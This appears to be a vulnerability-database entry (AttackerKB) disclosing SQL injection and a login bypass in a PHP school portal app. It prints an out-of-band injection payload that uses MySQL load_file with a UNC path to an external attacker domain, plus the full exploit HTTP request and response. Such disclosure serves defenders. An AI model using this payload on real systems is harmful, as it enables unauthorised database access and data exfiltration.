Very High
CVE-nu11-101321
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)
Very High
(1 user assessed)Unknown
Unknown
Unknown
CVE-nu11-101321
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
The id parameter appears to be vulnerable to three types of SQL injection attacks, boolean-based blind, error-based, and UNION query. The payload ‘+(select load_file(’\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc’))+’ was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Also, user login is vulnerable to SQL-Injection bypass authentication on parameter “username”.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
CVE-nu11-101321
Vendor
Description:
The id parameter from my_classmates.php on the Engineers Online Portal app appears to be vulnerable to three types of SQL injection attacks, boolean-based blind, error-based, and UNION query. The payload ‘+(select load_file(’\hh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net\ggc’))+’ was submitted in the id parameter. This payload injects a SQL sub-query that calls MySQL’s load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. Also, user login is vulnerable to SQL-Injection bypass authentication on parameter “username”.
MySQL Request:
GET /nia_munoz_monitoring_system/my_classmates.php?id=191'%2b(select%20load_file('%5c%5c%5c%5chh2s4z961nps5mtx8px8zoud248ywq0erhf82yqn.nu11secur1tyexploit.net%5c%5cggc'))%2b' HTTP/1.1 Host: 192.168.1.180 Cookie: PHPSESSID=5ndeh840im8k21e9mtnu57gp11 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.180/nia_munoz_monitoring_system/dashboard_student.php Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 Connection: close Cache-Control: max-age=0
Response:
HTTP/1.1 200 OK Date: Wed, 13 Oct 2021 07:15:40 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24 X-Powered-By: PHP/7.4.24 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10632 <!DOCTYPE html> <html class="no-js"> <head> <title>NIA Project Monitoring System</title> <meta name="description" content="Learning Management System"> <meta name="keywords" conte ...[SNIP]...
Reproduce:
Proof:
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
